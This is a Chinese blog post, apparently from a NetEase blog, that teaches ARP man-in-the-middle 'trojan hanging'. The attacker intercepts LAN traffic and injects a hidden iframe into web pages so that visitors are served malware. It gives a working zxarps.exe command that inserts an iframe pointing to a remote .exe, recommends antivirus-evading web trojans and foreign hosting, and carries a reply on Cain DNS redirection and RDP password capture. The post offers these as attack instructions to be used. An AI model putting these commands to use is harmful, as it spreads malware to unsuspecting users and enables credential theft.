注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

 
 
 
 
 

日志

 
 

ARP挂马攻击  

2015-01-12 09:46:14|  分类: 技术教学文章 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

arp 挂马算是一个新出的挂马方式 网上的资料觉的还是很少 

所以就整理一下发出来 

简单讲下arp欺骗 

通常的arp欺骗的攻击方式是在同一vlan,控制一台主机来监听密码

但这样存在局限性:1.管理员经常不登陆,那么要很久才能监听到密码 

目标主机只开放了80端口,和一个管理端口,80上只有静态页面,那么很 

难利用.而管理端口,如果是3389终端,或者是ssh2,那么非常难监听到密码

不改动任何目标主机的页面或者是配置,在网络传输的过程中间直接插入挂马的语句


正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机 
arp中间人攻击时候: A---->C---->B 
B---->C---->A 
实际上,C在这里做了一次代理的作用 

那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,HTTP响应包中,插入一段挂马的代码,比如 <iframe>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了

arp挂马的工具现在非常少  

个人认为LZX开发的zxarps.exe非常好 11K超级小 命令行下工具 

个人感觉命令行下的工具速度非常快 这个工具跟arpsniffer一样需要安 

winpacp驱动  

如果是单纯的ARP嗅探我还是推荐cain 以前没怎么用过 用过一次才知道 真是好东西 不用安装驱动 可视化界面  

DOS下输入zxarps.exe就会有帮助信息  

具体的我就不说了我只说一下挂马的参数  

比如自己的机器是192.168.2.14 

就输入zxarps.exe -idx 0 -ip 192.168.2.13-192.168.2.60 -port 80  

-insert "<iframe src=http://www.xxx.cn/xx.exe width=0 height=0>". 这样192.168.2.13-192.168.2.60 中间任何一台主机打开网页就会发现被插入挂马代码 

挂马的代码大家非常熟悉了 这里-idx 0 是网卡索引号 看几块网卡了  

-port 80就是在80端口 后面就是挂马的地址 有时候会扫不到alive host或者扫到的很少 大家换下IP范围就可以了 成功后会显示sniffering.. 

还有就是用iframe打开挂马页面会是空白 但是刚才问了下呆子 他说是可以的 

不过还是建议大家用JS挂马 网马现在还是06014免杀版的中马率比较  

大家都去国外的服务器挂吧 哈哈 就说这么多 累死我了 大家支持下

 

老大,无论是什么ARP工具,都需要一个驱动与网卡通信 
winpcap是必不可少的

CAIN 3.9可以捕获3389密码的
而且CAINarp-dns的功能,可以解析DNS到你挂马的网站
然后做个框架,效果要比直接ARp
因为一般10W流量站,网关压力非常大的.你搞不好很容易整个LAN垮掉
一般10W流量需要1G内存+1G的网.

  评论这张
 
阅读(195)| 评论(0)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017